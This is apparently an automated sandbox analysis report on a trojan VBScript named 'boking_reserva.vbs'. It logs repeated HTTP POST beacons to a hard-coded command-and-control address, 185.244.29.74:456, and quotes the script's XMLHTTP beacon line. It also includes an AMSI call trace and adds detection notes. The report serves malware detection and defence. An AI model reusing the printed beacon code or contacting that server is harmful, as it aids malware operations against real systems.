Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 98.1% probability |
Source: C:\Windows\System32\wscript.exe |
Network Connect: 185.244.29.74:456 (TCP; the IP and port are hard-coded in the script string below, so no DNS resolution precedes the connection) |
Source: |
Initial file: xx.open "POST", "http://185.244.29.74:456/document", False:xx.setrequestheader "User-Agent", gg:xx.send  (synchronous XMLHTTP POST beacon to the C2; the User-Agent is taken from script variable gg, observed on the wire as "B81A4609") |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 456 (plain HTTP on a non-standard destination port; the repeated connections below are the same beacon re-sent from successive ephemeral source ports) |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49721 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49725 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49726 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49729 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 456 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 456 |
Source: global traffic |
TCP traffic: 192.168.2.7:49699 -> 185.244.29.74:456 |
Source: boking_reserva.vbs |
Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4 |
Source: boking_reserva.vbs |
Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4 |
Source: Joe Sandbox View |
ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 (C2 address is hard-coded in the script, so DNS-based detection or sinkholing will not see this beacon; block/alert on the IP and port directly) |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown |
HTTP traffic detected: POST /document HTTP/1.1 | Accept: */* | User-Agent: B81A4609 | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: 185.244.29.74:456 | Content-Length: 0 | Connection: Keep-Alive | Cache-Control: no-cache  (empty-body POST beacon; the fixed User-Agent "B81A4609" is set literally by the script and can serve as a network signature) |
Source: wscript.exe, 00000000.00000002.3722607572.0000020DA68B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238956045.0000020DA85E4000.00000004.00000020.00020000.00000000.sdmp, boking_reserva.vbs |
String found in binary or memory: http://185.244.29.74:456/document |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document& |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document0 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/document609 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentEncoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documenta |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentcept-Encoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentd |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentf |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documenti |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentj |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.244.29.74:456/documentn |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: boking_reserva.vbs |
Initial sample: Strings found which are longer than 50 characters |
Source: classification engine |
Classification label: mal84.troj.evad.winVBS@1/0@0/1 |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs" |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy lookup performed by Windows Script Host at start-up; expected for any wscript.exe launch, not an indicator by itself) |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msxml3.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wbemcomn.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wininet.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winhttp.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mswsock.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iphlpapi.dll |
Source: C:\Windows\System32\wscript.exe |
Section loaded: winnsi.dll |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", 
"B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.ope |